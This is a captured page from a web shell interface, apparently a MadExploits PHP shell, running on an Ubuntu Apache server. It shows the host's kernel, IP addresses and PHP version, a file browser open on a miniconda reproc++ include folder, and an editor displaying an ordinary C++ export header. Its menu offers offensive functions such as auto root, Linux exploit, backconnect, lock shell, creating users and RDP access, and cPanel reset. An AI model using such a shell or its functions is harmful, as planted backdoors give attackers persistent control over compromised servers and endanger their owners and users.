Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
miniconda3 /
python /
include /
reproc++ /
[ HOME SHELL ]
Name
Size
Permission
Action
detail
[ DIR ]
drwxrwxr-x
arguments.hpp
1.43
KB
-rw-rw-r--
drain.hpp
3.36
KB
-rw-rw-r--
env.hpp
1.85
KB
-rw-rw-r--
export.hpp
469
B
-rw-rw-r--
input.hpp
643
B
-rw-rw-r--
reproc.hpp
5.72
KB
-rw-rw-r--
run.hpp
939
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : export.hpp
#pragma once #ifndef REPROCXX_EXPORT #ifdef _WIN32 #ifdef REPROCXX_SHARED #ifdef REPROCXX_BUILDING #define REPROCXX_EXPORT __declspec(dllexport) #else #define REPROCXX_EXPORT __declspec(dllimport) #endif #else #define REPROCXX_EXPORT #endif #else #ifdef REPROCXX_BUILDING #define REPROCXX_EXPORT __attribute__((visibility("default"))) #else #define REPROCXX_EXPORT #endif #endif #endif
Close